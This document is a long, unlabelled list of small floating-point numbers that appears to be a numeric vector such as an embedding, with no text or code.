-0.019232410937547684, 0.01055222563445568, 0.029024619609117508, 0.006684143096208572, -0.01167224906384945, -0.02331249788403511, -0.022160474210977554, -0.008864189498126507, 0.007036150433123112, -0.0026120557449758053, -0.007332156877964735, -0.023840509355068207, -0.013960298150777817, 0.02276848629117012, 0.037536803632974625, -0.020784445106983185, 0.014504309743642807, -0.020144430920481682, -0.009496202692389488, -0.010208218358457088, -0.0037860809825360775, -0.013616290874779224, -0.0012080258456990123, 0.015192324295639992, -0.015096322633326054, 0.0017430372536182404, 0.005596119444817305, 0.010544225573539734, 0.0004652599454857409, -0.013808295130729675, -0.015008321031928062, -0.0032080686651170254, -0.015376328490674496, 0.02844860777258873, -0.0007215154473669827, -0.018224390223622322, -0.01947241649031639, -0.011568247340619564, 0.0006840146379545331, 0.0038820828776806593, 0.023552503436803818, 0.014256305061280727, 0.015000320971012115, -0.004576097708195448, 0.02958463318645954, -0.01443230826407671, 0.017024364322423935, -0.010328221134841442, -0.02556854672729969, 0.026592567563056946, 0.0030600654426962137, -0.009240197949111462, 0.02196846902370453, 0.0030940661672502756, -0.00808017235249281, 0.016560353338718414, -0.017488373443484306, -0.018656399101018906, 0.018016384914517403, -0.02564854733645916, -0.012880275025963783, -0.021376457065343857, 0.0011280240723863244, 0.0048441034741699696, -0.001619034563191235, -0.007268155459314585, 0.005768123082816601, -0.002202047035098076, 0.0007050150888971984, -0.00006168882100610062, 0.019440416246652603, -0.02393651194870472, -0.02134445682168007, -0.004038086161017418, -0.004900104831904173, 0.002620056038722396, 0.017984384670853615, 0.008528182283043861, 0.017152367159724236, -0.003912083804607391, 0.00779216643422842, 0.002060044091194868, 0.016640355810523033, 0.014112302102148533, -0.014480309560894966, 0.025552546605467796, -0.0006770144682377577, -0.001087023178115487, 0.006144131533801556, -0.005748122930526733, -0.03366471827030182, 0.0073921578004956245, 0.030176645144820213, 0.025536546483635902, 0.002786059631034732, -0.004700100515037775, -0.010808231309056282, -0.003682078793644905, 0.0018470394425094128, -0.011288241483271122, 0.003310070838779211, 0.007628162857145071, 0.003704079193994403, 0.019120408222079277, 0.012016257271170616, -0.02100844867527485, 0.01900840550661087, 0.012592269107699394, -0.004032086115330458, -0.01351228915154934, -0.02025643363595009, 0.005304113496094942, -0.008848189376294613, 0.0007690164493396878, -0.006868146825581789, -0.02803259901702404, 0.030768657103180885, 0.0008070172625593841, 0.018224390223622322, 0.005848125088959932, -0.007500160485506058, -0.0029180622659623623, 0.004112088121473789, -0.008240176364779472, -0.011976256035268307, -0.0023160495329648256, -0.009224196895956993, -0.005204111337661743, -0.00988021120429039, -0.012856274843215942, 0.006824146024882793, -0.007000149693340063, -0.0060201287269592285, 0.018080387264490128, -0.02924862504005432, -0.009032192640006542, 0.01088023278862238, -0.005976127926260233, 0.0006340135587379336, -0.026752572506666183, -0.012848274782299995, 0.005752122960984707, -0.011432244442403316, 0.004420094657689333, 0.0005515117663890123, 0.019440416246652603, -0.01742437295615673, -0.0015170323895290494, 0.00492010498419404, 0.004800102673470974, -0.004988106433302164, -0.0012190260458737612, -0.01636034995317459, -0.012048257514834404, 0.008864189498126507, 0.002226047683507204, -0.0017270368989557028, -0.008256176486611366, -0.0072441548109054565, 0.007480159867554903, 0.0015370328910648823, 0.024656526744365692, 0.01168025005608797, 0.007000149693340063, -0.008488181047141552, 0.03539275750517845, -0.01809638738632202, -0.0036800785455852747, -0.0008200175361707807, 0.008032171986997128, -0.004120088182389736, 0.0052241114899516106, 0.007088151294738054, -0.01161624863743782, 0.007680164184421301, 0.0010890233097597957, 0.004848103504627943, -0.0005805123946629465, 0.009264198131859303, -0.018112387508153915, -0.011048235930502415, 0.0019810423254966736, -0.006128130946308374, -0.002248048083856702, 0.013720293529331684, 0.01600034162402153, 0.004648099187761545, -0.02572854980826378, 0.03459274023771286, 0.004224090371280909, 0.01675235852599144, 0.007532161194831133, 0.00461609847843647, 0.0017560375854372978, 0.007240154780447483, -0.00850418210029602, -0.005420115776360035, 0.009896211326122284, 0.004260091111063957, -0.009696207009255886, -0.01071222871541977, 0.0012180260382592678, 0.008960191160440445, 0.02188846841454506, 0.004280091263353825, 0.01443230826407671, -0.008680185303092003, 0.006480138283222914, 0.007592162117362022, -0.0047041005454957485, 0.0047041005454957485, -0.014592312276363373, -0.012608269229531288, 0.017152367159724236, 0.01309628039598465, -0.010608226992189884, 0.020992448553442955, 0.013280283659696579, 0.0015830338234081864, -0.0078001669608056545, -0.027344584465026855, 0.018784401938319206, 0.024416521191596985, 0.01833639107644558, 0.027664590626955032, 0.014672313816845417, -0.008680185303092003, -0.01155224721878767, -0.0050761085003614426, 0.0026820574421435595, -0.0239845123142004, -0.0130322789773345, 0.016896361485123634, 0.01466431375592947, -0.014672313816845417, 0.0046560997143387794, -0.015512331388890743, 0.01875240169465542, 0.02460852637887001, -0.0014750314876437187, 0.0025140538346022367, 0.004512096289545298, 0.0022180473897606134, 0.00101802172139287, 0.017536375671625137, -0.020080428570508957, -0.003526075277477503, 0.021408457309007645, -0.00009981463517760858, 0.02518453821539879, 0.0031160665675997734, -0.0018950405064970255, -0.0023560503032058477, 0.01716836728155613, 0.005164110567420721, 0.0031800679862499237, -0.017392370849847794, -0.0074761598370969296, 0.024336520582437515, -0.021920468658208847, -0.01716836728155613, -0.012320263311266899, -0.011808251962065697, -0.001656035427004099, 0.005488117225468159, -0.0035680762957781553, 0.001370029291138053, -0.012120258994400501, -0.02961663343012333, -0.0026500567328184843, -0.004328092560172081, -0.0014350307174026966, 0.010176217183470726, 0.02769659273326397, 0.023952512070536613, 0.00916819553822279, 0.019392414018511772, -0.0069561488926410675, -0.0054081156849861145, 0.00936019979417324, -0.02756858989596367, 0.021776465699076653, 0.003186068031936884, 0.01343228667974472, 0.002626056084409356, -0.009200196713209152, -0.011056235991418362, -0.004840103443711996, 0.008152173832058907, -0.017312370240688324, 0.0033460715785622597, 0.0025380542501807213, 0.015008321031928062, -0.003034064779058099, 0.002380050951614976, 0.00016600354865659028, -0.013104280456900597, -0.010976234450936317, -0.0197124220430851, -0.004772101994603872, 0.0008775187307037413, -0.007852167822420597, -0.012832274660468102, 0.005656120833009481, 0.009312199428677559, 0.006596141029149294, -0.0002880061510950327, -0.008256176486611366, -0.006560140289366245, 0.013760293833911419, -0.01318428199738264, 0.013504289090633392, -0.010736229829490185, 0.0010620227549225092, -0.00425209105014801, 0.0119922561571002, -0.004688100423663855, -0.01094423420727253, -0.030176645144820213, -0.017264369875192642, 0.018448393791913986, 0.0031260668765753508, -0.0028900618199259043, 0.019664419814944267, -0.005360114388167858, -0.016384350135922432, 0.0009050193475559354, -0.006432137452065945, 0.010672228410840034, 0.018080387264490128, -0.009864211082458496, 0.00736415758728981, -0.00035375755396671593, 0.008028171956539154, -0.013760293833911419, 0.009848210960626602, -0.018272390589118004, -0.014856318011879921, 0.006808145437389612, -0.007152152713388205, 0.006744144018739462, 0.0057961237616837025, 0.015424329787492752, -0.002082044491544366, 0.02064044028520584, -0.003798081073909998, -0.024336520582437515, -0.016016341745853424, -0.013784294947981834, 0.0010215218644589186, -0.0019780423026531935, -0.0013650291366502643, 0.02121645398437977, 0.02777659334242344, 0.01888040266931057, 0.006052129436284304, 0.005424115806818008, -0.00002273486097692512, 0.008044172078371048, 0.0237285066395998, -0.025424543768167496, -0.006444137543439865, -0.013880296610295773, 0.02720058150589466, -0.01247226633131504, 0.0005870125605724752, 0.00985621102154255, 0.00041225881432183087, 0.034112729132175446, -0.004964106250554323, 0.0016340349102392793, -0.0043320925906300545, -0.0006985149229876697, -0.016272347420454025, -0.0038480821531265974, -0.010224218480288982, 0.001476031495258212, 0.014632312580943108, -0.018352393060922623, -0.010872232727706432, -0.008824188262224197, 0.018896404653787613, -0.021632462739944458, 0.024624526500701904, 0.003570076311007142, -0.01032022014260292, 0.0057881237007677555, 0.004840103443711996, -0.001493031857535243, 0.010240218602120876, 0.01597634144127369, -0.0011020235251635313, -0.016656355932354927, -0.01414430234581232, 0.0059961280785501, 0.028640612959861755, 0.02318449504673481, 0.008060172200202942, -0.010024214163422585, 0.0175043735653162, -0.007048150524497032, 0.0099202124401927, -0.008216175250709057, 0.024880532175302505, -0.007672164123505354, -0.01584033854305744, 0.008216175250709057, 0.027392584830522537, -0.022160474210977554, -0.017024364322423935, -0.019104408100247383, 0.009024192579090595, -0.003658078145235777, 0.008232176303863525, -0.005124109331518412, -0.013768293894827366, 0.010176217183470726, 0.008576183579862118, 0.00879218801856041, -0.008664185181260109, 0.008028171956539154, 0.005856125149875879, 0.007468159776180983, 0.018064385280013084, -0.038208816200494766, -0.023536503314971924, -0.01046422403305769, 0.016368350014090538, 0.0014800316421315074, -0.0031040662433952093, 0.01549633126705885, -0.009800209663808346, 0.0001323778269579634, 0.004152088891714811, 0.013776294887065887, -0.03417672961950302, 0.0015550332609564066, -0.012240261770784855, -0.013744293712079525, 0.01353628933429718, 0.007600162643939257, -0.0017430372536182404, -0.01096823439002037, 0.0094642024487257, 0.0019000406609848142, 0.010392222553491592, 0.013712293468415737, 0.014464309439063072, -0.016576353460550308, 0.004836103413254023, -0.011952255852520466, -0.0008580183493904769, 0.019696421921253204, 0.004046086687594652, 0.004784102085977793, 0.010504224337637424, 0.01792038232088089, 0.011160238645970821, 0.0015560332685709, -0.01251226756721735, -0.004660099744796753, -0.012120258994400501, -0.007612162735313177, -0.02924862504005432, -0.0054001156240701675, 0.004772101994603872, -0.01659235544502735, -0.02803259901702404, -0.012792273424565792, -0.003370071994140744, -0.0189284048974514, -0.0009260197984986007, -0.013736293651163578, 0.00010318970453226939, -0.0056961216032505035, -0.01960041932761669, -0.007296156138181686, 0.003004064317792654, -0.015240325592458248, -0.005476117134094238, -0.018816402181982994, -0.00981620978564024, 0.005632120184600353, 0.00718415342271328, -0.00975220836699009, 0.008840189315378666, -0.0037520802579820156, -0.007848167791962624, -0.003842082107439637, 0.0027780593372881413, 0.0015860338462516665, -0.00712415250018239, -0.005532118026167154, -0.009656206704676151, -0.001130024204030633, 0.015136323869228363, -0.010760230012238026, 0.0018100386951118708, -0.006828146055340767, 0.011576247401535511, -0.008176174946129322, -0.029168622568249702, -0.018944405019283295, 0.02206447161734104, 0.0028200603555887938, -0.029840636998414993, -0.00856018252670765, -0.00872818659991026, -0.010072215460240841, 0.009672206826508045, 0.008944191038608551, 0.026624569669365883, -0.0016260347329080105, -0.03481674566864967, 0.014632312580943108, -0.013064279220998287, 0.006684143096208572, 0.04857703670859337, 0.024096515029668808, 0.001313028042204678, 0.007240154780447483, -0.02092844806611538, 0.012664270587265491, -0.031216667965054512, -0.007992170751094818, 0.0198404248803854, 0.00008512681961292401, -0.00031650677556172013, -0.007796166464686394, 0.01357629057019949, -0.008520182222127914, -0.005336114205420017, -0.0016540354117751122, 0.008096173405647278, 0.018688399344682693, 0.005956127308309078, 0.0038600824773311615, 0.008584183640778065, -0.01758437603712082, 0.00022962990624364465, 0.011112237349152565, -0.014256305061280727, 0.018432393670082092, 0.009224196895956993, 0.0008940190891735256, -0.005924126598984003, 0.013072279281914234, -0.009824209846556187, 0.016512352973222733, -0.0030400650575757027, 0.015072322450578213, -0.025328541174530983, 0.00275805895216763, 0.011408244259655476, 0.0028240603860467672, -0.00007631412881892174, 0.021824466064572334, -0.024128515273332596, 0.003870082786306739, -0.002586055314168334, -0.004788102116435766, 0.006176132243126631, 0.009824209846556187, 0.010040214285254478, -0.015656335279345512, 0.0079081691801548, 0.0006785144796594977, -0.022944491356611252, -0.012632270343601704, -0.0003175067831762135, 0.022544482722878456, 0.0000748766033211723, -0.012456266209483147, -0.008496182039380074, -0.014400308020412922, -0.021296454593539238, 0.002858061110600829, -0.006868146825581789, -0.00418808963149786, -0.014856318011879921, 0.006572140380740166, -0.005248112138360739, -0.024416521191596985, -0.016176346689462662, -0.023376500234007835, 0.007748165633529425, 0.018224390223622322, 0.007472159806638956, -0.008640184998512268, 0.006900147534906864, -0.0018710399745032191, 0.016240347176790237, -0.0030220646876841784, 0.009848210960626602, -0.017728378996253014, 0.011824253015220165, -0.03340871259570122, 0.02292848937213421, 0.007736165542155504, -0.008064172230660915, 0.015256325714290142, -0.012432266026735306, 0.0028200603555887938, 0.021088451147079468, 0.0025420542806386948, -0.05952127277851105, 0.0050841085612773895, 0.0014150302158668637, -0.018480395898222923, -0.010216218419373035, 0.011168238706886768, 0.022880489006638527, -0.010648227296769619, -0.019792422652244568, -0.02134445682168007, 0.0021860466804355383, -0.01942441612482071, 0.03257669508457184, 0.006876146886497736, 0.013840295374393463, 0.015880338847637177, 0.010032214224338531, -0.010728229768574238, -0.015568332746624947, 0.002222047420218587, -0.017280369997024536, -0.009112195111811161, 0.003936083987355232, 0.01704036444425583, -0.006272133905440569, 0.02836860716342926, -0.0006070130039006472, -0.007228154689073563, 0.008872189559042454, -0.002986063715070486, -0.018352393060922623, -0.014944319613277912, 0.015256325714290142, -0.004172089044004679, -0.0236005038022995, 0.008976192213594913, 0.004548097029328346, -0.019408414140343666, -0.01576833613216877, -0.011416244320571423, 0.00143903074786067, -0.003052065148949623, 0.016384350135922432, -0.01405630074441433, -0.010568225756287575, -0.0002727558312471956, 0.007784166373312473, 0.005060108378529549, 0.01683235913515091, -0.00341007299721241, -0.000133002846268937, 0.008536182343959808, -0.0028240603860467672, 0.022416479885578156, -0.0022400477901101112, -0.0031620676163583994, -0.005712122190743685, 0.0015280327061191201, -0.0033340712543576956, 0.0030560654122382402, -0.0007785166380926967, 0.007588162086904049, 0.019664419814944267, 0.020544439554214478, -0.02256048284471035, -0.004504096228629351, 0.002712057903409004, 0.012224261648952961, -0.010568225756287575, 0.023216497153043747, 0.006396136712282896, -0.029472630470991135, 0.01340828649699688, 0.015736335888504982, -0.006180132273584604, -0.01048822421580553, 0.00796017050743103, -0.0010280220303684473, -0.01238426472991705, -0.032560694962739944, 0.012600269168615341, 0.017600376158952713, 0.0031620676163583994, 0.004156088922172785, -0.015512331388890743, 0.008288176730275154, -0.007756165694445372, 0.007304156199097633, 0.012504267506301403, 0.005940127186477184, -0.005336114205420017, 0.009104195050895214, -0.00003139129694318399, 0.020064428448677063, 0.018368393182754517, -0.01052822545170784, 0.029968639835715294, -0.0019750422798097134, -0.0014710314571857452, -0.004002085421234369, 0.035264752805233, -0.01180025190114975, 0.009280198253691196, -0.008004170842468739, -0.017392370849847794, 0.007516160607337952, 0.018064385280013084, 0.00988021120429039, -0.010336221195757389, -0.006052129436284304, -0.012480266392230988, 0.004348092712461948, -0.02523253858089447, -0.004748101346194744, 0.02611255832016468, -0.007508160546422005, 0.015056321397423744, 0.017328370362520218, 0.004148088861256838, -0.01059222687035799, 0.0061601316556334496, 0.015376328490674496, 0.02432052046060562, -0.0092081967741251, -0.016928361728787422, 0.0030160644091665745, 0.007632163353264332, -0.013680292293429375, -0.00335207162424922, -0.019200410693883896, 0.004244090523570776, 0.0015310327289626002, -0.012496267445385456, -0.027936596423387527, 0.009064193814992905, -0.020416436716914177, -0.03580876439809799, 0.0060281287878751755, -0.0066401418298482895, 0.0013610291061922908, 0.010192218236625195, 0.01038422156125307, 0.01636034995317459, 0.010568225756287575, 0.012352264486253262, 0.019536416977643967, 0.009112195111811161, -0.027472587302327156, 0.022704485803842545, -0.022528480738401413, -0.0124482661485672, 0.03747279942035675, -0.004116088151931763, -0.010864232666790485, -0.016896361485123634, 0.00824817642569542, -0.003404072718694806, -0.002960063284263015, 0.0037760806735605, -0.009304198436439037, 0.009744208306074142, 0.0004657599492929876, 0.002440052106976509, -0.0074241585098207, -0.0031360669527202845, 0.020960448309779167, -0.0011770251439884305, 0.010064215399324894, -0.001204025698825717, 0.010736229829490185, 0.0014800316421315074, 0.006620141677558422, -0.005208111368119717, -0.01900840550661087, -0.009896211326122284, -0.008808188140392303, 0.043168921023607254, 0.0038620824925601482, 0.024512523785233498, 0.0022960491478443146, 0.005016107112169266, -0.0027640589978545904, 0.002784059615805745, -0.008784187957644463, 0.020496437326073647, 0.015704335644841194, -0.003878082847222686, -0.000017719128663884476, -0.016864361241459846, 0.01203225739300251, 0.019040407612919807, 0.025664549320936203, 0.010112215764820576, -0.008640184998512268, -0.011544247157871723, -0.011152238585054874, -0.005000106990337372, 0.025712549686431885, 0.009808209724724293, -0.012024257332086563, 0.005792123731225729, 0.005748122930526733, -0.009496202692389488, -0.010752229951322079, 0.014744315296411514, -0.010032214224338531, -0.00937620084732771, -0.010744229890406132, 0.0008535182569175959, 0.00497210631147027, -0.0092081967741251, -0.007860167883336544, 0.002746058627963066, -0.024384520947933197, -0.007512160576879978, -0.0026420564390718937, 0.0029400628991425037, -0.0342407301068306, 0.005976127926260233, 0.018848402425646782, -0.004524096846580505, -0.007176153361797333, -0.011056235991418362, 0.02761659026145935, 0.00024288019631057978, 0.015352328307926655, 0.0017340370686724782, -0.012960276566445827, -0.010616227053105831, -0.0028680614195764065, -0.0007020150078460574, 0.014920318499207497, -0.0016640356043353677, 0.008352178148925304, 0.03024064563214779, 0.009552204050123692, 0.012016257271170616, 0.004988106433302164, -0.0006680142832919955, 0.00496010622009635, -0.012848274782299995, -0.01155224721878767, 0.004860104061663151, 0.017312370240688324, -0.007768166251480579, 0.01184025313705206, 0.007884168066084385, 0.015880338847637177, -0.0004872604040428996, 0.00347207416780293, -0.0047121006064116955, -0.006072129588574171, -0.016272347420454025, -0.022880489006638527, -0.0010075215250253677, 0.010416222736239433, 0.009704207070171833, -0.00898419227451086, -0.014696313999593258, -0.022256474941968918, -0.011936254799365997, 0.001147024566307664, 0.010800231248140335, 0.0021120451856404543, 0.016848359256982803, -0.014760315418243408, 0.014328306540846825, 0.011896254494786263, 0.004078087396919727, 0.003928083926439285, -0.005024107173085213, -0.0028300604317337275, 0.00840017944574356, 0.012000256218016148, 0.008424179628491402, 0.00018625397933647037, -0.00820817518979311, 0.020944448187947273, 0.0015860338462516665, 0.02289648912847042, 0.0028160600923001766, -0.02707257866859436, 0.012048257514834404, -0.012016257271170616, -0.007132152561098337, -0.010256219655275345, 0.04352093115448952, 0.005424115806818008, 0.018064385280013084, 0.0032040684018284082, 0.0048441034741699696, -0.019408414140343666, 0.018448393791913986, 0.012176260352134705, 0.011880254372954369, 0.004512096289545298, -0.02494453266263008, 0.009640205651521683, 0.01151224598288536, 0.009808209724724293, -0.030976662412285805, -0.004692100454121828, 0.011752251535654068, -0.004516096320003271, 0.016272347420454025, 0.0032620697747915983, 0.021456459537148476, 0.02025643363595009, 0.026416564360260963, 0.017200367525219917, 0.02544054388999939, 0.005656120833009481, 0.01667235605418682, 0.01963241957128048, -0.005260112229734659, -0.02072044275701046, -0.005420115776360035, -0.001147024566307664, -0.024640526622533798, -0.008552182465791702, -0.00984020996838808, -0.006328135263174772, 0.01288827508687973, 0.013608290813863277, -0.000462759897345677, 0.0031260668765753508, -0.020272433757781982, 0.01090423297137022, -0.00030400650575757027, -0.0055001177825033665, -0.010992234572768211, 0.009672206826508045, 0.016400350257754326, -0.013304284773766994, -0.006576140411198139, 0.008360179141163826, 0.029392627999186516, -0.004896104801446199, 0.0037540802732110023, 0.006644141860306263, -0.005560118705034256, -0.027088578790426254, 0.013264283537864685, 0.006276133935898542, -0.0007870168192312121, -0.00940020103007555, 0.0016770358197391033, 0.005240112077444792, -0.005404115654528141, -0.0014060300309211016, -0.0022100473288446665, 0.003736079903319478, 0.0074921599589288235, 0.012008256278932095, 0.005816124379634857, -0.0029680633451789618, 0.000347507419064641, 0.009472202509641647, -0.0173763707280159, 0.007092151790857315, 0.0093361996114254, 0.013632290996611118, -0.004964106250554323, -0.005792123731225729, -0.012368264608085155, 0.013200282119214535, -0.006332135293632746, 0.027600590139627457, 0.0026420564390718937, 0.0027220582123845816, -0.006760144606232643, 0.004042086191475391, -0.002692057518288493, 0.013376286253333092, 0.005828124471008778, 0.010864232666790485, 0.006916147656738758, -0.02004842832684517, -0.010872232727706432, 0.02051243931055069, -0.003856082446873188, -0.015104322694242, -0.0019460415933281183, -0.0016810359666123986, -0.004744101315736771, 0.020688442513346672, 0.019280411303043365, 0.04006485641002655, 0.013008277863264084, -0.007128152530640364, -0.001928041223436594, 0.0004440094926394522, -0.014576311223208904, 0.0035680762957781553, -0.021360456943511963, 0.002386050997301936, 0.011480245739221573, 0.0023900510277599096, 0.010096215642988682, -0.01683235913515091, -0.009120195172727108, 0.007956170476973057, -0.010472224093973637, -0.002108045155182481, -0.02193646878004074, 0.027184581384062767, 0.026256561279296875, -0.004360093269497156, -0.0035480759106576443, -0.037408798933029175, 0.0011100237024948, -0.004744101315736771, 0.025664549320936203, -0.009000192396342754, -0.020576439797878265, 0.011208239942789078, 0.00492010498419404, 0.0186723992228508, -0.009024192579090595, 0.0040840874426066875, -0.008240176364779472, 0.020864445716142654, 0.013592290692031384, -0.0026100557297468185, -0.0006315134814940393, -0.0176323764026165, -0.008240176364779472, -0.003470074152573943, 0.014712314121425152, -0.005220111459493637, 0.025136537849903107, -0.011104237288236618, 0.005676121450960636, -0.011912254616618156, 0.010088215582072735, 0.01680035889148712, 0.005404115654528141, 0.0047041005454957485, 0.001891040476039052, -0.009928212501108646, 0.01721636764705181, -0.005972127430140972, 0.01125624030828476, -0.01562433410435915, -0.00545211648568511, -0.010040214285254478, -0.02427251823246479, 0.013360285200178623, -0.0029160622507333755, -0.008176174946129322, -0.0074761598370969296, 0.02494453266263008, 0.0018490395741537213, 0.006496138870716095, -0.012736272066831589, 0.0093361996114254, 0.007128152530640364, 0.005704122129827738, -0.021664462983608246, -0.015856338664889336, -0.00929619837552309, 0.010608226992189884, -0.005144109949469566, 0.007768166251480579, 0.01708836480975151, -0.011312241666018963, -0.022704485803842545, -0.009504202753305435, -0.0071121519431471825, -0.005736122839152813, 0.002188046695664525, -0.011208239942789078, -0.008648185059428215, 0.0036420777905732393, 0.009312199428677559, 0.023408500477671623, -0.014512309804558754, -0.013072279281914234, 0.02873661369085312, -0.002952062990516424, -0.0039340839721262455, 0.017776379361748695, 0.002320049563422799, 0.0032160687260329723, -0.029056621715426445, -0.01950441673398018, -0.00952820386737585, 0.013416286557912827, 0.0118642533197999, -0.010448222979903221, -0.0018670399440452456, -0.012312263250350952, -0.004224090371280909, 0.00792016927152872, 0.007952169515192509, -0.047393012791872025, 0.018144387751817703, 0.0009735208004713058, -0.01864039897918701, -0.012880275025963783, 0.009632205590605736, -0.027584590017795563, 0.002440052106976509, -0.012336263433098793, -0.0019770422950387, -0.021872468292713165, -0.008832188323140144, -0.0047201006673276424, 0.02878461591899395, -0.019328413531184196, -0.022048471495509148, 0.029056621715426445, -0.011464244686067104, -0.0029180622659623623, 0.0011340242344886065, -0.01299227774143219, 0.006068129558116198, 0.010048214346170425, -0.003178067971020937, 0.00365007808431983, 0.024112515151500702, 0.006376136094331741, -0.009584205225110054, 0.004816102795302868, -0.0013870296534150839, 0.0023620505817234516, 0.02377650886774063, -0.02235247753560543, -0.015736335888504982, 0.022672483697533607, -0.0008485181606374681, -0.0014480309328064322, 0.018656399101018906, 0.007620162796229124, 0.012896276079118252, 0.00461609847843647, 0.0050281076692044735, 0.008904190734028816, 0.009392200969159603, 0.007384157739579678, -0.016248347237706184, 0.01318428199738264, 0.002562054665759206, -0.0006515139248222113, -0.009744208306074142, -0.000015726898709544912, 0.004988106433302164, -0.0021780466195195913, -0.001545033068396151, 0.004404094070196152, -0.02556854672729969, 0.01132024172693491, -0.008016170933842659, 0.00784416776150465, -0.015264326706528664, -0.018624398857355118, 0.002846060786396265, 0.0024780528619885445, 0.009472202509641647, 0.019536416977643967, 0.00724815484136343, -0.016120344400405884, -0.005216111429035664, 0.014320306479930878, 0.03443273529410362, 0.0002847560972440988, -0.0066321417689323425, -0.004272091202437878, 0.014520310796797276, -0.003980085253715515, -0.008808188140392303, -0.0035480759106576443, 0.0018570397514849901, 0.019984427839517593, 0.0011000235099345446, -0.01077623013406992, 0.014104301109910011, -0.01399229932576418, -0.010200218297541142, 0.01597634144127369, 0.017984384670853615, -0.00287806149572134, 0.015552332624793053, 0.014656313695013523, 0.006044129375368357, 0.006300134584307671, -0.02168046310544014, 0.003994085360318422, 0.0023380499333143234, 0.0016260347329080105, -0.008736186660826206, 0.005632120184600353, -0.026512566953897476, -0.012936276383697987, -0.012328263372182846, -0.010376221500337124, 0.04169689118862152, -0.00652813958004117, 0.014104301109910011, 0.004132088273763657, 0.025168538093566895, 0.022128472104668617, -0.021824466064572334, 0.005020107142627239, 0.006496138870716095, -0.004800102673470974, -0.013240283355116844, 0.020000427961349487, -0.0047201006673276424, 0.006116130854934454, -0.013320284895598888, 0.003968084696680307, 0.014128302223980427, 0.00772816501557827, 0.007840167731046677, 0.025472544133663177, 0.01449630968272686, 0.0004657599492929876, 0.013368286192417145, 0.013168281875550747, -0.008544182404875755, 0.007776166312396526, -0.006136131007224321, -0.0035280755255371332, -0.0014050300233066082, 0.006080130115151405, 0.03721679374575615, 0.016976362094283104, 0.025920553132891655, 0.02113645151257515, 0.005804124288260937, 0.009560204111039639, 0.03542475774884224, 0.0006860146531835198, 0.005396115127950907, -0.014384307898581028, 0.01264027040451765, -0.017056364566087723, 0.0016260347329080105, -0.009056193754076958, 0.010088215582072735, -0.006680142600089312, 0.0014890318270772696, -0.002540054265409708, 0.005272112786769867, -0.004764101933687925, -0.00420008972287178, 0.019280411303043365, -0.008976192213594913, -0.0001270027132704854, 0.017952384427189827, -0.0056961216032505035, -0.025136537849903107, 0.0004545097181107849, 0.02699257619678974, 0.03041665069758892, 0.015776338055729866, -0.011096237227320671, -0.014776315540075302, 0.010224218480288982, -0.004212089814245701, -0.012768273241817951, 0.009624205529689789, 0.0036600781604647636, -0.016784358769655228, -0.01626434735953808, -0.0022840488236397505, -0.013904296793043613, 0.013144280761480331, -0.021984469145536423, -0.003392072394490242, 0.015960341319441795, 0.02660856954753399, -0.006932148244231939, -0.0019720422569662333, 0.005892125889658928, -0.02448052354156971, 0.009256198070943356, 0.007900169119238853, 0.006460138130933046, -0.00977620854973793, -0.03044865094125271, -0.025088535621762276, 0.007376157678663731, -0.00377008062787354, -0.005496117286384106, -0.005340114235877991, 0.00418808963149786, 0.007036150433123112, -0.01514432393014431, -0.017568375915288925, -0.0020900447852909565, 0.0176323764026165, -0.0032540694810450077, -0.0017380370991304517, -0.03606477007269859, 0.004216090310364962, -0.012320263311266899, 0.005192110780626535, 0.0040840874426066875, 0.004624099005013704, -0.01584833860397339, 0.019584419205784798, -0.015888338908553123, -0.005368114914745092, 0.009264198131859303, 0.020784445106983185, -0.0012550267856568098, -0.014008299447596073, -0.005844125058501959, -0.033568717539310455, -0.00011412744061090052, 0.0046680998057127, -0.0021700463257730007, -0.002766059013083577, 0.006192132364958525, 0.00670414324849844, -0.0043800934217870235, -0.013680292293429375, -0.0009175196173600852, -0.023456500843167305, -0.0015410329215228558, -0.014264305122196674, -0.015088322572410107, 0.006104130297899246, 0.014400308020412922, -0.0040080854669213295, 0.01472831517457962, -0.006016128696501255, 0.0177603792399168, 0.006684143096208572, 0.002858061110600829, 0.005352114327251911, -0.011464244686067104, 0.01447230949997902, 0.0024440521374344826, -0.023200495168566704, 0.0016070343554019928, 0.00420008972287178, 0.012336263433098793, -0.017104364931583405, -0.02452852390706539, 0.00030250646523199975, -0.02510453574359417, -0.004456095397472382, 0.004772101994603872, -0.004688100423663855, -0.027392584830522537, -0.010248218663036823, 0.007876168005168438, 0.014464309439063072, -0.011728250421583652, -0.00022537981567438692, 0.03230468928813934, -0.0054161157459020615, 0.01399229932576418, -0.007240154780447483, 0.011144238524138927, -0.0092081967741251, 0.01838439330458641, -0.0010235218796879053, -0.006296134553849697, 0.010640227235853672, -0.004584097769111395, 0.015120322816073895, 0.009184196591377258, -0.0005045107682235539, 0.03427273407578468, 0.020416436716914177, -0.007548161316663027, -0.009328199550509453, -0.006084130145609379, -0.025792552158236504, -0.0043240925297141075, 0.0017750379629433155, -0.001030022045597434, 0.01792038232088089, 0.004912104923278093, -0.004684099927544594, -0.004836103413254023, -0.020864445716142654, -0.017648376524448395, 0.004488096106797457, 0.012752272188663483, -0.005840125028043985, -0.007952169515192509, 0.010616227053105831, -0.012544267810881138, -0.008008170872926712, 0.0544651634991169, -0.0034000726882368326, 0.011664249002933502, 0.012056257575750351, -0.016768358647823334, 0.001708036521449685, -0.0006590140983462334, -0.012816273607313633, -0.02302449196577072, -0.00010618977103149518, -0.006052129436284304, -0.02201647125184536, -0.0028840615414083004, 0.004352093208581209, -0.009384200908243656, 0.007180153392255306, 0.010408222675323486, 0.007700164802372456, -0.008240176364779472, -0.025472544133663177, -0.0004257590917404741, -0.002672057133167982, 0.017280369997024536, 0.006092130206525326, 0.010184217244386673, 0.01552033144980669, -0.014048300683498383, -0.00473210122436285, -0.015984341502189636, -0.03228868916630745, 0.008200175128877163, -0.009736208245158195, 0.010072215460240841, 0.022752486169338226, 0.005136109888553619, 0.013360285200178623, -0.0033160708844661713, 0.029648633673787117, -0.019952425733208656, -0.000298256374662742, 0.009192196652293205, 0.01729637011885643, -0.0031280668918043375, 0.005480117164552212, -0.0003770080511458218, 0.015160324051976204, -0.03192068263888359, -0.014880318194627762, 0.01042422279715538, 0.0074761598370969296, 0.019328413531184196, 0.001030022045597434, 0.0074761598370969296, 0.0024680527858436108, 0.011664249002933502, 0.012336263433098793, -0.0017710378160700202, 0.00562812015414238, -0.0036400777753442526, -0.015304327011108398, 0.0003015064576175064, -0.014904318377375603, -0.0012480267323553562, -0.013456287793815136, -0.03436873480677605, 0.0060121286660432816, 0.011304241605103016, 0.002784059615805745, 0.014400308020412922, 0.01833639107644558, -0.004004085436463356, -0.01992042548954487, 0.007172153331339359, -0.015424329787492752, -0.005252112168818712, -0.012112258933484554, 0.009560204111039639, -0.019376413896679878, -0.013216282241046429, 